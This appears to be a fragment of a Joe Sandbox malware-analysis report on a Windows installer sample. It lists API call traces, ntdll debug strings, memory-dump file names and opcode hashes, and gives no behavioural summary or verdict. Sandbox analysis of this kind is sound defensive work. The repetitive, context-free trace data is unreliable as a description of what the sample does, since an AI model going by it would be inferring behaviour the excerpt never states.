                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D59
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D79
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404DC7
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404DD2
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404DD9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                                                                                                                                                • Opcode ID: ec91b3c05056c8a31251e6ec194b5f81d354e456f94ac355a5bd5cd62dfa5eea
                                                                                                                                                                                                                                                                • Instruction ID: 85f2183cf6d0466de3af39f406c7ee36f40fbb46029595ad20bc80e91715a9ea
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec91b3c05056c8a31251e6ec194b5f81d354e456f94ac355a5bd5cd62dfa5eea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B0281B0A00209AFEB20DF55DD85AAE7BB5FB84315F14817AF610B62E1C7789D42CF58

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 00403103
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 0040310E
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403115
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: LoadLibraryA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                • SHGetFileInfoA.SHELL32(004287E0,00000000,?,00000160,00000000,00000008), ref: 0040313D
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,0042DBA0,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                • GetCommandLineA.KERNEL32(0042DBA0,NSIS Error), ref: 00403152
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00434000,00000000), ref: 00403165
                                                                                                                                                                                                                                                                • CharNextA.USER32(00000000,00434000,00000020), ref: 00403190
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000400,00435400,00000000,00000020), ref: 0040328D
                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(00435400,000003FB), ref: 0040329E
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00435400,\Temp), ref: 004032AA
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(000003FC,00435400,00435400,\Temp), ref: 004032BE
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00435400,Low), ref: 004032C6
                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,00435400,00435400,Low), ref: 004032D7
                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,00435400), ref: 004032DF
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00435000), ref: 004032F3
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 004033A1
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004033C1
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00435400,~nsu.tmp,00434000,00000000,?), ref: 004033CD
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(00435400,00434C00), ref: 004033D9
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00435400,00000000), ref: 004033E5
                                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(00435400), ref: 004033EC
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(004283E0,004283E0,?,0042F000,?), ref: 00403445
                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(00435C00,004283E0,00000001), ref: 00403459
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004283E0,004283E0,?,004283E0,00000000), ref: 00403486
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034DB
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403517
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040353A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: "$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                • API String ID: 4107622049-1245305578
                                                                                                                                                                                                                                                                • Opcode ID: 5582cf7e80513128dcd25e4139f5933d1710ea380e8354cb828c356b10781b78
                                                                                                                                                                                                                                                                • Instruction ID: ab5bd0cb9fd354075505a922324eb5159d0c68426fb539e9448df04d541e8703
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5582cf7e80513128dcd25e4139f5933d1710ea380e8354cb828c356b10781b78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FB105706082416AE7216F659D8DA2B7EA8AB45306F04047FF581B62E3C77C9E05CB6E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $ $0
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3352262554
                                                                                                                                                                                                                                                                • Opcode ID: e46b65d035374d8afc62434a0851213842362b9b42483a04e3d20cf045652283
                                                                                                                                                                                                                                                                • Instruction ID: 9067d0cd40a08a6db5cc34e2557edb7a9369f5de4216f651537961c07ffd1441
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e46b65d035374d8afc62434a0851213842362b9b42483a04e3d20cf045652283
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A53205B5A08385CFE350CF68C484B5BBBE9BB88344F044A2EF99987351D775E948CB52
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00435400,756A3410,00000000), ref: 0040547A
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(0042A828,\*.*,0042A828,?,?,00435400,756A3410,00000000), ref: 004054C2
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00409014,?,0042A828,?,?,00435400,756A3410,00000000), ref: 004054E3
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,0042A828,?,?,00435400,756A3410,00000000), ref: 004054E9
                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(0042A828,?,?,?,00409014,?,0042A828,?,?,00435400,756A3410,00000000), ref: 004054FA
                                                                                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055A7
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004055B8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 2035342205-1173974218
                                                                                                                                                                                                                                                                • Opcode ID: 6349f3dff572452614f878026353f92d633d12771a0199604bde9a196fc5ff50
                                                                                                                                                                                                                                                                • Instruction ID: aa82d0309f1ddddfbe6c40bd1d7433d9f6730d94ca5b26b608a9a455718634cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6349f3dff572452614f878026353f92d633d12771a0199604bde9a196fc5ff50
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D51D030900A04BADB216B618C45BBF7AB9DF86715F14407BF444B61D2D73C9982DEAE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                                                                                                • Opcode ID: d6bbdf5cd0a118caf89ac7f06d0161e5c050c3176f453638bf597e73c699fa3e
                                                                                                                                                                                                                                                                • Instruction ID: 105a1d10e57fb405618efff6ed600a9b0d6ca1036d4c6f69a373bef0e0e14481
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6bbdf5cd0a118caf89ac7f06d0161e5c050c3176f453638bf597e73c699fa3e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1519FB5508315DBD325CF5CD844A9BBBECEB84391F444A5DBAA8C3241EB70D644CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3392D879
                                                                                                                                                                                                                                                                  • Part of subcall function 33904779: RtlDebugPrintTimes.NTDLL ref: 33904817
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 338FD136
                                                                                                                                                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 338FD0E6
                                                                                                                                                                                                                                                                • @, xrefs: 338FD09D
                                                                                                                                                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 338FD202
                                                                                                                                                                                                                                                                • @, xrefs: 338FD2B3
                                                                                                                                                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 338FD06F
                                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 338FD263
                                                                                                                                                                                                                                                                • @, xrefs: 338FD24F
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • VerifierDebug, xrefs: 33988925
                                                                                                                                                                                                                                                                • VerifierDlls, xrefs: 3398893D
                                                                                                                                                                                                                                                                • HandleTraces, xrefs: 3398890F
                                                                                                                                                                                                                                                                • VerifierFlags, xrefs: 339888D0
                                                                                                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 3398880F
                                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 339886BD
                                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 339886E7
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3396A79F
                                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 33922382
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 3396A7AF
                                                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 3396A7A5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 33971F6F
                                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33971FC9
                                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33971F8A
                                                                                                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33971FA9
                                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33971F82
                                                                                                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 33971F6A, 33971FA4, 33971FC4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 33977F8C, 33978000
                                                                                                                                                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 33977FF0
                                                                                                                                                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 33977F7B
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 3393C5E3
                                                                                                                                                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 33977F82, 33977FF6
                                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 3393C5E4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                                • API String ID: 0-475462383
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 339780E9
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 339780F3
                                                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 339780E2
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 33984519
                                                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33984508
                                                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 3398450F
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 3392534B
                                                                                                                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 33925167
                                                                                                                                                                                                                                                                • WindowsExcludedProcs, xrefs: 3392514A
                                                                                                                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 3392519B
                                                                                                                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 33925272
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                                                • API String ID: 0-258546922
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                                                                                                • API String ID: 0-3061284088
                                                                                                                                                                                                                                                                • Opcode ID: 7e3566862cc6a1bb223797586bc56d3209ad14cf59abaa0e189b8b8c82b396bb
                                                                                                                                                                                                                                                                • Instruction ID: 50570cf98eaa2ffd0652475b62f82208124a0409d48b1b7feb55f112a13a5aff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e3566862cc6a1bb223797586bc56d3209ad14cf59abaa0e189b8b8c82b396bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32014C37506244DEF307E7ACF408F4277D8DB41771F18408AF0504BB91DA969884DA54
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
